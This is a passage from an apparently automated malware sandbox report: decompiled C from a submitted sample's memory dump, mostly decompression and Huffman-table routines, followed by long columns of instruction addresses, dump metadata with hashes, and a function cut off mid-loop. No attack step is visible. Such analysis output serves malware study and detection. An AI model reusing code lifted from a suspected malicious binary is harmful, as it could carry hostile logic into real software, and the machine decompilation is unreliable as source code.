                                                  												__eax = E0040755C(__esi + 0xc + __edi * 4,  *(__ebp - 0x14), 0, 0x408568, 0x4085a4, __ebp - 0x1c, __ebp - 0x10,  &(__esi[0x148]), __ebp - 0xc);
                                                  												__eflags = __eax;
                                                  												if(__eax != 0) {
                                                  													goto L9;
                                                  												}
                                                  												L98:
                                                  												__eax =  *(__ebp - 0x10);
                                                  												__eflags =  *(__ebp - 0x10);
                                                  												if( *(__ebp - 0x10) != 0) {
                                                  													L100:
                                                  													__cl =  *(__ebp - 4);
                                                  													 *__esi =  *__esi & 0x00000000;
                                                  													__eflags =  *__esi;
                                                  													__esi[4] = __al;
                                                  													__eax =  *(__ebp - 0x18);
                                                  													__esi[5] =  *(__ebp - 0x18);
                                                  													__eax =  *(__ebp - 0x1c);
                                                  													__esi[4] = __cl;
                                                  													__esi[6] =  *(__ebp - 0x1c);
                                                  													goto L101;
                                                  												}
                                                  												L99:
                                                  												__eflags = __edi - 0x101;
                                                  												if(__edi > 0x101) {
                                                  													goto L9;
                                                  												}
                                                  												goto L100;
                                                  											}
                                                  										case 0xe:
                                                  											goto L9;
                                                  										case 0xf:
                                                  											L175:
                                                  											__eax =  *(__ebp - 0x30);
                                                  											__esi[0x26ea] =  *(__ebp - 0x30);
                                                  											__eax = E004074F4( *((intOrPtr*)(__ebp + 8)));
                                                  											__ecx = __esi[0x26ea];
                                                  											__edx = __esi[0x26e9];
                                                  											__eflags = __ecx - __edx;
                                                  											 *(__ebp - 0x30) = __ecx;
                                                  											if(__ecx >= __edx) {
                                                  												__eax = __esi[0x26e8];
                                                  												__eax = __esi[0x26e8] - __ecx;
                                                  												__eflags = __eax;
                                                  											} else {
                                                  												__edx = __edx - __ecx;
                                                  												__eax = __edx - __ecx - 1;
                                                  											}
                                                  											__eflags = __ecx - __edx;
                                                  											 *(__ebp - 0x2c) = __eax;
                                                  											if(__ecx != __edx) {
                                                  												L183:
                                                  												__edi = 0;
                                                  												goto L10;
                                                  											} else {
                                                  												L179:
                                                  												__eax = __esi[0x145];
                                                  												__eflags = __eax - 8;
                                                  												 *__esi = __eax;
                                                  												if(__eax != 8) {
                                                  													L184:
                                                  													0 = 1;
                                                  													goto L10;
                                                  												}
                                                  												goto L180;
                                                  											}
                                                  									}
                                                  								}
                                                  								L181:
                                                  								goto L9;
                                                  							}
                                                  							L70:
                                                  							if( *__edi == __eax) {
                                                  								goto L72;
                                                  							}
                                                  							L71:
                                                  							__esi[2] = __esi[2] & __eax;
                                                  							 *__esi = 0xd;
                                                  							goto L93;
                                                  						}
                                                  					}
                                                  				}
                                                  				L182:
                                                  				_t443 = 0;
                                                  				_t446[0x147] =  *(_t448 - 0x40);
                                                  				_t446[0x146] = _t425;
                                                  				( *(_t448 + 8))[1] = 0;
                                                  				goto L11;
                                                  			}









                                                  0x00406d85
                                                  0x00406d85
                                                  0x00406d85
                                                  0x00406d85
                                                  0x00406d85
                                                  0x00406d89
                                                  0x00000000
                                                  0x00000000
                                                  0x00406d8f
                                                  0x00406d8f
                                                  0x00406d92
                                                  0x00406d95
                                                  0x00406d9a
                                                  0x00406d9c
                                                  0x00406d9f
                                                  0x00406da2
                                                  0x00406da5
                                                  0x00406da5
                                                  0x00406da8
                                                  0x00000000
                                                  0x00000000
                                                  0x00406daa
                                                  0x00406daa
                                                  0x00406dad
                                                  0x00406db2
                                                  0x00406db4
                                                  0x00406db7
                                                  0x00406dbd
                                                  0x00406b1c
                                                  0x00406b1c
                                                  0x00406b1f
                                                  0x00406b25
                                                  0x00406b2b
                                                  0x00406b34
                                                  0x00406b3a
                                                  0x00406b3d
                                                  0x00406b44
                                                  0x00406b49
                                                  0x00406b4f
                                                  0x00406b5a
                                                  0x00406b5a
                                                  0x00406dc3
                                                  0x00406dc3
                                                  0x00406dcd
                                                  0x00000000
                                                  0x00000000
                                                  0x00406dd3
                                                  0x00406dd3
                                                  0x00406dd7
                                                  0x00406dda
                                                  0x00406dda
                                                  0x00406dde
                                                  0x00406de4
                                                  0x00406de4
                                                  0x00406de7
                                                  0x00406dea
                                                  0x00406df0
                                                  0x00000000
                                                  0x00000000
                                                  0x00406df2
                                                  0x00406e14
                                                  0x00406e14
                                                  0x00406e17
                                                  0x00000000
                                                  0x00000000
                                                  0x00406df4
                                                  0x00406df8
                                                  0x00000000
                                                  0x00000000
                                                  0x00406dfe
                                                  0x00406dfe
                                                  0x00406e01
                                                  0x00406e04
                                                  0x00406e09
                                                  0x00406e0b
                                                  0x00406e0e
                                                  0x00406e11
                                                  0x00406e11
                                                  0x00406e19
                                                  0x00406e19
                                                  0x00406e1f
                                                  0x00406e22
                                                  0x00406e25
                                                  0x00406e25
                                                  0x00406e2c
                                                  0x00406e30
                                                  0x00406e34
                                                  0x00406e37
                                                  0x00406e3a
                                                  0x00406e40
                                                  0x00406e45
                                                  0x00000000
                                                  0x00000000
                                                  0x00406e47
                                                  0x00406e5b
                                                  0x00406e5b
                                                  0x00406e5f
                                                  0x00000000
                                                  0x00000000
                                                  0x00406e49
                                                  0x00406e4c
                                                  0x00406e4c
                                                  0x00406e53
                                                  0x00406e58
                                                  0x00406e58
                                                  0x00406e58
                                                  0x00406e61
                                                  0x00406e61
                                                  0x00406e64
                                                  0x00406e72
                                                  0x00406e78
                                                  0x00406e7d
                                                  0x00406e83
                                                  0x00406e89
                                                  0x00406e8f
                                                  0x00406e96
                                                  0x00406eaa
                                                  0x00406eaa
                                                  0x00407479
                                                  0x00407479
                                                  0x00407479
                                                  0x0040747e
                                                  0x00000000
                                                  0x00000000
                                                  0x00406ab6
                                                  0x00406ab6
                                                  0x00000000
                                                  0x004070b1
                                                  0x004070b1
                                                  0x004070b5
                                                  0x004070b8
                                                  0x004070bb
                                                  0x004070be
                                                  0x00000000
                                                  0x00000000
                                                  0x004070c4
                                                  0x004070c4
                                                  0x004070e9
                                                  0x004070e9
                                                  0x004070e9
                                                  0x004070eb
                                                  0x00000000
                                                  0x00000000
                                                  0x004070c9
                                                  0x004070c9
                                                  0x004070cd
                                                  0x00000000
                                                  0x00000000
                                                  0x004070d3
                                                  0x004070d3
                                                  0x004070d6
                                                  0x004070d9
                                                  0x004070dc
                                                  0x004070de
                                                  0x004070e0
                                                  0x004070e3
                                                  0x004070e6
                                                  0x004070e6
                                                  0x004070e6
                                                  0x004070ed
                                                  0x004070ed
                                                  0x004070f5
                                                  0x004070f8
                                                  0x004070fb
                                                  0x004070fe
                                                  0x00407102
                                                  0x00407105
                                                  0x00407107
                                                  0x0040710a
                                                  0x0040710c
                                                  0x00407120
                                                  0x00407120
                                                  0x00407123
                                                  0x0040713d
                                                  0x0040713d
                                                  0x00407140
                                                  0x00000000
                                                  0x00000000
                                                  0x00407146
                                                  0x00407146
                                                  0x00407149
                                                  0x00000000
                                                  0x00000000
                                                  0x0040714f
                                                  0x0040714f
                                                  0x00000000
                                                  0x0040714f
                                                  0x00407125
                                                  0x00407128
                                                  0x0040712f
                                                  0x00407132
                                                  0x00000000
                                                  0x00407132
                                                  0x0040710e
                                                  0x00407112
                                                  0x00407115
                                                  0x00000000
                                                  0x00000000
                                                  0x0040715a
                                                  0x0040715a
                                                  0x0040717f
                                                  0x0040717f
                                                  0x0040717f
                                                  0x00407181
                                                  0x00000000
                                                  0x00000000
                                                  0x0040715f
                                                  0x0040715f
                                                  0x00407163
                                                  0x00000000
                                                  0x00000000
                                                  0x00407169
                                                  0x00407169
                                                  0x0040716c
                                                  0x0040716f
                                                  0x00407172
                                                  0x00407174
                                                  0x00407176
                                                  0x00407179
                                                  0x0040717c
                                                  0x0040717c
                                                  0x0040717c
                                                  0x00407183
                                                  0x0040718b
                                                  0x0040718e
                                                  0x00407191
                                                  0x00407193
                                                  0x00407196
                                                  0x00407196
                                                  0x00407198
                                                  0x0040719c
                                                  0x0040719f
                                                  0x004071a2
                                                  0x004071a5
                                                  0x00000000
                                                  0x00000000
                                                  0x004071ab
                                                  0x004071ab
                                                  0x004071d0
                                                  0x004071d0
                                                  0x004071d0
                                                  0x004071d2
                                                  0x00000000
                                                  0x00000000
                                                  0x004071b0
                                                  0x004071b0
                                                  0x004071b4
                                                  0x00000000
                                                  0x00000000
                                                  0x004071ba
                                                  0x004071ba
                                                  0x004071bd
                                                  0x004071c0
                                                  0x004071c3
                                                  0x004071c5
                                                  0x004071c7
                                                  0x004071ca
                                                  0x004071cd
                                                  0x004071cd
                                                  0x004071cd
                                                  0x004071d4
                                                  0x004071d4
                                                  0x004071dc
                                                  0x004071df
                                                  0x004071e2
                                                  0x004071e5
                                                  0x004071e9
                                                  0x004071ec
                                                  0x004071ee
                                                  0x004071f1
                                                  0x004071f4
                                                  0x0040720e
                                                  0x0040720e
                                                  0x00407211
                                                  0x00000000
                                                  0x00000000
                                                  0x00407217
                                                  0x00407217
                                                  0x0040721a
                                                  0x00407221
                                                  0x00000000
                                                  0x00407221
                                                  0x004071f6
                                                  0x004071f9
                                                  0x00407200
                                                  0x00407203
                                                  0x00000000
                                                  0x00000000
                                                  0x00407229
                                                  0x00407229
                                                  0x0040724e
                                                  0x0040724e
                                                  0x0040724e
                                                  0x00407250
                                                  0x00000000
                                                  0x00000000
                                                  0x0040722e
                                                  0x0040722e
                                                  0x00407232
                                                  0x00000000
                                                  0x00000000
                                                  0x00407238
                                                  0x00407238
                                                  0x0040723b
                                                  0x0040723e
                                                  0x00407241
                                                  0x00407243
                                                  0x00407245
                                                  0x00407248
                                                  0x0040724b
                                                  0x0040724b
                                                  0x0040724b
                                                  0x00407252
                                                  0x0040725a
                                                  0x0040725d
                                                  0x00407260
                                                  0x00407262
                                                  0x00407265
                                                  0x00407265
                                                  0x00407267
                                                  0x00000000
                                                  0x00000000
                                                  0x0040726d
                                                  0x0040726d
                                                  0x00407270
                                                  0x00407275
                                                  0x00407277
                                                  0x0040727d
                                                  0x0040727f
                                                  0x00407294
                                                  0x00407296
                                                  0x00407296
                                                  0x00407281
                                                  0x00407287
                                                  0x00407289
                                                  0x0040728b
                                                  0x0040728b
                                                  0x00407298
                                                  0x0040729c
                                                  0x0040729f
                                                  0x004072a5
                                                  0x004072a5
                                                  0x004072a8
                                                  0x004072a8
                                                  0x004072a8
                                                  0x004072aa
                                                  0x00000000
                                                  0x00000000
                                                  0x004072b0
                                                  0x004072b0
                                                  0x004072b6
                                                  0x004072b8
                                                  0x004072dd
                                                  0x004072e0
                                                  0x004072e6
                                                  0x004072eb
                                                  0x004072f1
                                                  0x004072f7
                                                  0x004072f9
                                                  0x004072fc
                                                  0x00407305
                                                  0x0040730b
                                                  0x0040730b
                                                  0x004072fe
                                                  0x00407300
                                                  0x00407302
                                                  0x00407302
                                                  0x0040730d
                                                  0x00407313
                                                  0x00407315
                                                  0x00407318
                                                  0x0040731a
                                                  0x00407320
                                                  0x00407322
                                                  0x00407324
                                                  0x00407326
                                                  0x00407328
                                                  0x0040732b
                                                  0x00407334
                                                  0x00407337
                                                  0x00407337
                                                  0x0040732d
                                                  0x0040732d
                                                  0x00407330
                                                  0x00407330
                                                  0x0040732b
                                                  0x00407322
                                                  0x00407339
                                                  0x0040733b
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040733b
                                                  0x004072ba
                                                  0x004072ba
                                                  0x004072c0
                                                  0x004072c6
                                                  0x004072c8
                                                  0x00000000
                                                  0x00000000
                                                  0x004072ca
                                                  0x004072ca
                                                  0x004072cc
                                                  0x004072ce
                                                  0x004072d7
                                                  0x004072d7
                                                  0x004072d0
                                                  0x004072d0
                                                  0x004072d3
                                                  0x004072d3
                                                  0x004072d9
                                                  0x004072db
                                                  0x00000000
                                                  0x00000000
                                                  0x00407341
                                                  0x00407341
                                                  0x00407346
                                                  0x00407348
                                                  0x00407349
                                                  0x0040734a
                                                  0x0040734b
                                                  0x00407351
                                                  0x00407354
                                                  0x00407357
                                                  0x0040735a
                                                  0x0040735c
                                                  0x00407362
                                                  0x00407362
                                                  0x00407365
                                                  0x00407365
                                                  0x00407365
                                                  0x00407365
                                                  0x0040736e
                                                  0x00000000
                                                  0x00000000
                                                  0x00407373
                                                  0x00407373
                                                  0x00407376
                                                  0x00407379
                                                  0x0040737b
                                                  0x00407412
                                                  0x00407412
                                                  0x00407415
                                                  0x00407417
                                                  0x00407418
                                                  0x00407419
                                                  0x0040741c
                                                  0x00000000
                                                  0x0040741c
                                                  0x00407381
                                                  0x00407381
                                                  0x00407387
                                                  0x00407389
                                                  0x004073ae
                                                  0x004073b1
                                                  0x004073b7
                                                  0x004073bc
                                                  0x004073c2
                                                  0x004073c8
                                                  0x004073ca
                                                  0x004073cd
                                                  0x004073d6
                                                  0x004073dc
                                                  0x004073dc
                                                  0x004073cf
                                                  0x004073d1
                                                  0x004073d3
                                                  0x004073d3
                                                  0x004073de
                                                  0x004073e4
                                                  0x004073e6
                                                  0x004073e9
                                                  0x004073eb
                                                  0x004073f1
                                                  0x004073f3
                                                  0x004073f5
                                                  0x004073f7
                                                  0x004073f9
                                                  0x004073fc
                                                  0x00407405
                                                  0x00407408
                                                  0x00407408
                                                  0x004073fe
                                                  0x004073fe
                                                  0x00407401
                                                  0x00407401
                                                  0x004073fc
                                                  0x004073f3
                                                  0x0040740a
                                                  0x0040740c
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040740c
                                                  0x0040738b
                                                  0x0040738b
                                                  0x00407391
                                                  0x00407397
                                                  0x00407399
                                                  0x00000000
                                                  0x00000000
                                                  0x0040739b
                                                  0x0040739b
                                                  0x0040739d
                                                  0x0040739f
                                                  0x004073a6
                                                  0x004073a6
                                                  0x004073a8
                                                  0x004073a1
                                                  0x004073a1
                                                  0x004073a3
                                                  0x004073a3
                                                  0x004073aa
                                                  0x004073ac
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00407424
                                                  0x00407424
                                                  0x00407427
                                                  0x00407429
                                                  0x0040742c
                                                  0x0040742f
                                                  0x0040742f
                                                  0x0040742f
                                                  0x0040742f
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406add
                                                  0x00406ac1
                                                  0x00000000
                                                  0x00406ac7
                                                  0x00406aca
                                                  0x00406ad4
                                                  0x00406ad7
                                                  0x00406ada
                                                  0x00000000
                                                  0x00406ada
                                                  0x00406ac1
                                                  0x00406ae5
                                                  0x00406ae8
                                                  0x00406aec
                                                  0x00406af6
                                                  0x00406b00
                                                  0x00406b03
                                                  0x00406b09
                                                  0x00406c3d
                                                  0x00406c3f
                                                  0x00406c45
                                                  0x00406c48
                                                  0x00406c4b
                                                  0x00000000
                                                  0x00406c4b
                                                  0x00406b0f
                                                  0x00406b0f
                                                  0x00406b10
                                                  0x00406b68
                                                  0x00406b68
                                                  0x00406b6f
                                                  0x00406c15
                                                  0x00406c15
                                                  0x00406c1a
                                                  0x00406c1d
                                                  0x00406c22
                                                  0x00406c25
                                                  0x00406c2a
                                                  0x00406c2d
                                                  0x00406c32
                                                  0x00406c35
                                                  0x00406c35
                                                  0x00000000
                                                  0x00406b75
                                                  0x00406b75
                                                  0x00406b75
                                                  0x00406b75
                                                  0x00406b79
                                                  0x00406b79
                                                  0x00406b9b
                                                  0x00406b9e
                                                  0x00406ba0
                                                  0x00406ba3
                                                  0x00406ba8
                                                  0x00406b7e
                                                  0x00406b7e
                                                  0x00406b83
                                                  0x00406b85
                                                  0x00406b87
                                                  0x00406b8c
                                                  0x00406b92
                                                  0x00406b97
                                                  0x00406b99
                                                  0x00406b99
                                                  0x00406b8e
                                                  0x00406b8e
                                                  0x00406b8e
                                                  0x00406b8c
                                                  0x00000000
                                                  0x00406baa
                                                  0x00406bd7
                                                  0x00406bdc
                                                  0x00406bde
                                                  0x00406bdf
                                                  0x00406be1
                                                  0x00406be2
                                                  0x00406be2
                                                  0x00406be2
                                                  0x00406c0a
                                                  0x00406c0f
                                                  0x00406c0f
                                                  0x00000000
                                                  0x00406c0f
                                                  0x00406ba8
                                                  0x00406b6f
                                                  0x00406b12
                                                  0x00406b12
                                                  0x00406b13
                                                  0x00406b5d
                                                  0x00000000
                                                  0x00406b5d
                                                  0x00406b15
                                                  0x00406b16
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406c72
                                                  0x00406c72
                                                  0x00406c72
                                                  0x00406c75
                                                  0x00000000
                                                  0x00000000
                                                  0x00406c52
                                                  0x00406c52
                                                  0x00406c56
                                                  0x00000000
                                                  0x00000000
                                                  0x00406c5c
                                                  0x00406c5c
                                                  0x00406c5f
                                                  0x00406c62
                                                  0x00406c67
                                                  0x00406c69
                                                  0x00406c6c
                                                  0x00406c6f
                                                  0x00406c6f
                                                  0x00406c6f
                                                  0x00406c77
                                                  0x00406c77
                                                  0x00406c7a
                                                  0x00406c7c
                                                  0x00406c81
                                                  0x00406c84
                                                  0x00406c86
                                                  0x00406c89
                                                  0x00000000
                                                  0x00000000
                                                  0x00406c8f
                                                  0x00406c8f
                                                  0x00406c91
                                                  0x00000000
                                                  0x00000000
                                                  0x00406c97
                                                  0x00406c97
                                                  0x00406c9b
                                                  0x00000000
                                                  0x00000000
                                                  0x00406ca1
                                                  0x00406ca1
                                                  0x00406ca4
                                                  0x00406ca6
                                                  0x00406d44
                                                  0x00406d44
                                                  0x00406d47
                                                  0x00406d49
                                                  0x00406d49
                                                  0x00406d4c
                                                  0x00406d4f
                                                  0x00406d51
                                                  0x00406d53
                                                  0x00406d55
                                                  0x00406d55
                                                  0x00406d5e
                                                  0x00406d63
                                                  0x00406d66
                                                  0x00406d69
                                                  0x00406d6c
                                                  0x00406d6f
                                                  0x00406d6f
                                                  0x00406d6f
                                                  0x00406d72
                                                  0x00406d78
                                                  0x00406d78
                                                  0x00406d7e
                                                  0x00406d7e
                                                  0x00406d7e
                                                  0x00000000
                                                  0x00406d72
                                                  0x00406cac
                                                  0x00406cac
                                                  0x00406cb2
                                                  0x00406cb5
                                                  0x00406cb7
                                                  0x00406ce2
                                                  0x00406ce5
                                                  0x00406ceb
                                                  0x00406cf0
                                                  0x00406cf6
                                                  0x00406cfc
                                                  0x00406cfe
                                                  0x00406d01
                                                  0x00406d0a
                                                  0x00406d10
                                                  0x00406d10
                                                  0x00406d03
                                                  0x00406d05
                                                  0x00406d07
                                                  0x00406d07
                                                  0x00406d12
                                                  0x00406d18
                                                  0x00406d1b
                                                  0x00406d1d
                                                  0x00406d1f
                                                  0x00406d25
                                                  0x00406d27
                                                  0x00406d29
                                                  0x00406d2c
                                                  0x00406d35
                                                  0x00406d35
                                                  0x00406d37
                                                  0x00406d2e
                                                  0x00406d2e
                                                  0x00406d31
                                                  0x00406d31
                                                  0x00406d39
                                                  0x00406d39
                                                  0x00406d27
                                                  0x00406d3c
                                                  0x00406d3e
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406d3e
                                                  0x00406cb9
                                                  0x00406cb9
                                                  0x00406cbf
                                                  0x00406cc5
                                                  0x00406cc7
                                                  0x00000000
                                                  0x00000000
                                                  0x00406cc9
                                                  0x00406cc9
                                                  0x00406ccb
                                                  0x00406ccd
                                                  0x00406cd0
                                                  0x00406cd7
                                                  0x00406cd7
                                                  0x00406cd9
                                                  0x00406cd2
                                                  0x00406cd2
                                                  0x00406cd4
                                                  0x00406cd4
                                                  0x00406cdb
                                                  0x00406cdd
                                                  0x00406ce0
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406de4
                                                  0x00406de7
                                                  0x00406dea
                                                  0x00406df0
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406fc7
                                                  0x00406fc7
                                                  0x00406fc7
                                                  0x00406fca
                                                  0x00406fcd
                                                  0x00406fcf
                                                  0x00406fd2
                                                  0x00406fd8
                                                  0x00406fdf
                                                  0x00406fe1
                                                  0x00000000
                                                  0x00000000
                                                  0x00406eb5
                                                  0x00406eb5
                                                  0x00406edd
                                                  0x00406edd
                                                  0x00406edd
                                                  0x00406edf
                                                  0x00000000
                                                  0x00000000
                                                  0x00406ebd
                                                  0x00406ebd
                                                  0x00406ec1
                                                  0x00000000
                                                  0x00000000
                                                  0x00406ec7
                                                  0x00406ec7
                                                  0x00406eca
                                                  0x00406ecd
                                                  0x00406ed0
                                                  0x00406ed2
                                                  0x00406ed4
                                                  0x00406ed7
                                                  0x00406eda
                                                  0x00406eda
                                                  0x00406eda
                                                  0x00406ee1
                                                  0x00406ee1
                                                  0x00406ee9
                                                  0x00406eec
                                                  0x00406ef2
                                                  0x00406ef5
                                                  0x00406ef9
                                                  0x00406efd
                                                  0x00406f00
                                                  0x00406f03
                                                  0x00406f1b
                                                  0x00406f1b
                                                  0x00406f1e
                                                  0x00406f2c
                                                  0x00406f2f
                                                  0x00406f20
                                                  0x00406f20
                                                  0x00406f22
                                                  0x00406f29
                                                  0x00406f29
                                                  0x00406f58
                                                  0x00406f58
                                                  0x00406f58
                                                  0x00406f5b
                                                  0x00406f5d
                                                  0x00000000
                                                  0x00000000
                                                  0x00406f38
                                                  0x00406f38
                                                  0x00406f3c
                                                  0x00000000
                                                  0x00000000
                                                  0x00406f42
                                                  0x00406f42
                                                  0x00406f45
                                                  0x00406f48
                                                  0x00406f4b
                                                  0x00406f4d
                                                  0x00406f4f
                                                  0x00406f52
                                                  0x00406f55
                                                  0x00406f55
                                                  0x00406f55
                                                  0x00406f5f
                                                  0x00406f5f
                                                  0x00406f61
                                                  0x00406f63
                                                  0x00406f6e
                                                  0x00406f71
                                                  0x00406f74
                                                  0x00406f76
                                                  0x00406f78
                                                  0x00406f7a
                                                  0x00406f7d
                                                  0x00406f80
                                                  0x00406f85
                                                  0x00406f88
                                                  0x00406f8b
                                                  0x00406f8e
                                                  0x00406f95
                                                  0x00406f98
                                                  0x00406f9a
                                                  0x00000000
                                                  0x00000000
                                                  0x00406fa0
                                                  0x00406fa0
                                                  0x00406fa4
                                                  0x00406fb5
                                                  0x00406fb5
                                                  0x00406fb5
                                                  0x00406fb7
                                                  0x00406fb7
                                                  0x00406fbb
                                                  0x00406fbb
                                                  0x00406fbb
                                                  0x00406fbd
                                                  0x00406fbe
                                                  0x00406fc1
                                                  0x00406fc1
                                                  0x00406fc1
                                                  0x00406fc4
                                                  0x00000000
                                                  0x00406fc4
                                                  0x00406fa6
                                                  0x00406fa6
                                                  0x00406fa9
                                                  0x00000000
                                                  0x00000000
                                                  0x00406faf
                                                  0x00406faf
                                                  0x00000000
                                                  0x00406faf
                                                  0x00406f05
                                                  0x00406f05
                                                  0x00406f07
                                                  0x00406f09
                                                  0x00406f0c
                                                  0x00406f0f
                                                  0x00406f13
                                                  0x00406f13
                                                  0x00406fe7
                                                  0x00406fe7
                                                  0x00406fea
                                                  0x00406ff1
                                                  0x00406ff5
                                                  0x00406ff7
                                                  0x00406ffa
                                                  0x00406ffd
                                                  0x00407002
                                                  0x00407005
                                                  0x00407007
                                                  0x00407008
                                                  0x0040700b
                                                  0x00407016
                                                  0x00407019
                                                  0x00407030
                                                  0x00407035
                                                  0x0040703c
                                                  0x00407041
                                                  0x00407045
                                                  0x00407047
                                                  0x00407047
                                                  0x00407047
                                                  0x0040704a
                                                  0x0040704c
                                                  0x00000000
                                                  0x00407052
                                                  0x00407052
                                                  0x00407056
                                                  0x00407061
                                                  0x00407074
                                                  0x00407079
                                                  0x0040707e
                                                  0x00407080
                                                  0x00000000
                                                  0x00000000
                                                  0x00407086
                                                  0x00407086
                                                  0x00407089
                                                  0x0040708b
                                                  0x00407099
                                                  0x00407099
                                                  0x0040709c
                                                  0x0040709c
                                                  0x0040709f
                                                  0x004070a2
                                                  0x004070a5
                                                  0x004070a8
                                                  0x004070ab
                                                  0x004070ae
                                                  0x00000000
                                                  0x004070ae
                                                  0x0040708d
                                                  0x0040708d
                                                  0x00407093
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00407093
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00407432
                                                  0x00407432
                                                  0x00407438
                                                  0x0040743e
                                                  0x00407443
                                                  0x00407449
                                                  0x0040744f
                                                  0x00407451
                                                  0x00407454
                                                  0x0040745d
                                                  0x00407463
                                                  0x00407463
                                                  0x00407456
                                                  0x00407458
                                                  0x0040745a
                                                  0x0040745a
                                                  0x00407465
                                                  0x00407467
                                                  0x0040746a
                                                  0x004074a5
                                                  0x004074a5
                                                  0x00000000
                                                  0x0040746c
                                                  0x0040746c
                                                  0x0040746c
                                                  0x00407472
                                                  0x00407475
                                                  0x00407477
                                                  0x004074ac
                                                  0x004074ae
                                                  0x00000000
                                                  0x004074ae
                                                  0x00000000
                                                  0x00407477
                                                  0x00000000
                                                  0x00406ab6
                                                  0x00407484
                                                  0x00000000
                                                  0x00407484
                                                  0x00406e98
                                                  0x00406e9a
                                                  0x00000000
                                                  0x00000000
                                                  0x00406e9c
                                                  0x00406e9c
                                                  0x00406e9f
                                                  0x00000000
                                                  0x00406e9f
                                                  0x00406de4
                                                  0x00406da5
                                                  0x00407489
                                                  0x0040748c
                                                  0x0040748e
                                                  0x00407497
                                                  0x0040749d
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.943726621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.943674353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943797629.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943839130.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943873169.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944047963.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944072511.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944106193.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944149006.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944177313.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fbe53aaae7eeab696340878b5eee03eb0fd33fb80e94407ce6853ed186f7d00c
                                                  • Instruction ID: 3db1d01f4341fbbb805040525b4c18df43ce82c239752998d09602440244d977
                                                  • Opcode Fuzzy Hash: fbe53aaae7eeab696340878b5eee03eb0fd33fb80e94407ce6853ed186f7d00c
                                                  • Instruction Fuzzy Hash: FEE18A71A0070ADFCB24CF59D880BAABBF5FB44305F15852EE496A72D1D338AA91CF45
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E0040755C(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
                                                  				signed int _v8;
                                                  				unsigned int _v12;
                                                  				signed int _v16;
                                                  				intOrPtr _v20;
                                                  				signed int _v24;
                                                  				signed int _v28;
                                                  				intOrPtr* _v32;
                                                  				signed int* _v36;
                                                  				signed int _v40;
                                                  				signed int _v44;
                                                  				intOrPtr _v48;
                                                  				intOrPtr _v52;
                                                  				void _v116;
                                                  				signed int _v176;
                                                  				signed int _v180;
                                                  				signed int _v240;
                                                  				signed int _t166;
                                                  				signed int _t168;
                                                  				intOrPtr _t175;
                                                  				signed int _t181;
                                                  				void* _t182;
                                                  				intOrPtr _t183;
                                                  				signed int* _t184;
                                                  				signed int _t186;
                                                  				signed int _t187;
                                                  				signed int* _t189;
                                                  				signed int _t190;
                                                  				intOrPtr* _t191;
                                                  				intOrPtr _t192;
                                                  				signed int _t193;
                                                  				signed int _t195;
                                                  				signed int _t200;
                                                  				signed int _t205;
                                                  				void* _t207;
                                                  				short _t208;
                                                  				signed char _t222;
                                                  				signed int _t224;
                                                  				signed int _t225;
                                                  				signed int* _t232;
                                                  				signed int _t233;
                                                  				signed int _t234;
                                                  				void* _t235;
                                                  				signed int _t236;
                                                  				signed int _t244;
                                                  				signed int _t246;
                                                  				signed int _t251;
                                                  				signed int _t254;
                                                  				signed int _t256;
                                                  				signed int _t259;
                                                  				signed int _t262;
                                                  				void* _t263;
                                                  				void* _t264;
                                                  				signed int _t267;
                                                  				intOrPtr _t269;
                                                  				intOrPtr _t271;
                                                  				signed int _t274;
                                                  				intOrPtr* _t275;
                                                  				unsigned int _t276;
                                                  				void* _t277;
                                                  				signed int _t278;
                                                  				intOrPtr* _t279;
                                                  				signed int _t281;
                                                  				intOrPtr _t282;
                                                  				intOrPtr _t283;
                                                  				signed int* _t284;
                                                  				signed int _t286;
                                                  				signed int _t287;
                                                  				signed int _t288;
                                                  				signed int _t296;
                                                  				signed int* _t297;
                                                  				intOrPtr _t298;
                                                  				void* _t299;
                                                  
                                                  				_t278 = _a8;
                                                  				_t187 = 0x10;
                                                  				memset( &_v116, 0, _t187 << 2);
                                                  				_t189 = _a4;
                                                  				_t233 = _t278;
                                                  				do {
                                                  					_t166 =  *_t189;
                                                  					_t189 =  &(_t189[1]);
                                                  					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
